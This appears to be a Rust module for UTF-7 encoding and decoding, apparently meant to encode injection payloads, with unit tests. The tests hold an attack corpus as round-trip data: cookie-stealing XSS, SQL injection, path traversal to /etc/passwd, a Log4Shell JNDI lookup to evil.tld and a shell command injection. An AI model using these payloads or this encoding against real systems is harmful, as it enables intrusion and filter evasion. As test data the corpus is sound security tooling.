use base64::{Engine as _, engine::general_purpose};
fn char_to_utf16be(c: char) -> Vec<u8> {
let mut buf = [0u16; 2];
let enc = c.encode_utf16(&mut buf);
let mut out = Vec::with_capacity(enc.len() * 2);
for u in enc {
out.push((*u >> 8) as u8);
out.push((*u & 0xFF) as u8);
}
out
}
fn modified_base64(bytes: &[u8]) -> String {
let mut b64 = general_purpose::STANDARD.encode(bytes);
b64.retain(|c| c != '=');
b64
}
fn is_utf7_direct(ch: char) -> bool {
matches!(
ch,
'A'..='Z'
| 'a'..='z'
| '0'..='9'
| '\''
| '('
| ')'
| ','
| '-'
| '.'
| '/'
| ':'
| '?'
)
}
#[must_use]
pub fn utf7_encode(payload: &str) -> String {
let mut out = String::new();
let mut shift_buf: Vec<u8> = Vec::new();
fn flush_shift(out: &mut String, buf: &mut Vec<u8>) {
if !buf.is_empty() {
out.push('+');
out.push_str(&modified_base64(buf));
out.push('-');
buf.clear();
}
}
for ch in payload.chars() {
if ch == '+' {
flush_shift(&mut out, &mut shift_buf);
out.push_str("+-");
} else if is_utf7_direct(ch) {
flush_shift(&mut out, &mut shift_buf);
out.push(ch);
} else {
shift_buf.extend_from_slice(&char_to_utf16be(ch));
}
}
flush_shift(&mut out, &mut shift_buf);
out
}
fn is_modified_base64_byte(b: u8) -> bool {
b.is_ascii_alphanumeric() || b == b'+' || b == b'/'
}
fn utf8_lead_len(first: u8) -> usize {
match first {
0x00..=0x7F => 1,
0xC0..=0xDF => 2,
0xE0..=0xEF => 3,
_ => 4,
}
}
#[must_use]
pub fn utf7_decode(s: &str) -> Option<String> {
let b = s.as_bytes();
let mut out = String::new();
let mut i = 0;
while i < b.len() {
if b[i] == b'+' {
if i + 1 < b.len() && b[i + 1] == b'-' {
out.push('+');
i += 2;
continue;
}
let start = i + 1;
let mut j = start;
while j < b.len() && is_modified_base64_byte(b[j]) {
j += 1;
}
let mut chunk = s[start..j].to_string();
while !chunk.len().is_multiple_of(4) {
chunk.push('='); }
let raw = general_purpose::STANDARD.decode(chunk.as_bytes()).ok()?;
if raw.len() % 2 != 0 {
return None; }
let units: Vec<u16> = raw
.chunks_exact(2)
.map(|c| (u16::from(c[0]) << 8) | u16::from(c[1]))
.collect();
out.push_str(&String::from_utf16(&units).ok()?);
i = j;
if i < b.len() && b[i] == b'-' {
i += 1; }
} else {
let len = utf8_lead_len(b[i]);
if i + len > b.len() {
return None;
}
out.push_str(s.get(i..i + len)?);
i += len;
}
}
Some(out)
}
#[cfg(test)]
mod tests {
use super::{utf7_decode, utf7_encode};
#[test]
fn utf7_basic_encode() {
assert_eq!(utf7_encode("Hello"), "Hello"); assert_eq!(utf7_encode("A+B"), "A+-B"); assert!(utf7_encode("日本語").starts_with('+')); }
#[test]
fn utf7_decode_matches_canonical_vectors() {
assert_eq!(utf7_decode("+ADw-script+AD4-").as_deref(), Some("<script>"));
assert_eq!(utf7_decode("+-").as_deref(), Some("+"));
assert_eq!(utf7_decode("hello").as_deref(), Some("hello"));
assert_eq!(utf7_encode("<script>"), "+ADw-script+AD4-");
}
#[test]
fn utf7_round_trips_attack_corpus_and_unicode() {
let corpus = [
"<script>alert(document.cookie)</script>",
"' OR '1'='1' -- ",
"1 UNION SELECT password FROM users",
"../../../../etc/passwd",
"${jndi:ldap://evil.tld/a}",
"; cat /etc/passwd",
"plain ascii",
"+already+plus+",
"café ☕ 日本語 😀 surrogate-pair",
"",
"=",
"<>\"'&;|()[]{}",
];
for p in corpus {
let enc = utf7_encode(p);
assert_eq!(
utf7_decode(&enc).as_deref(),
Some(p),
"UTF-7 round-trip lost bytes for {p:?} via {enc}"
);
}
}
}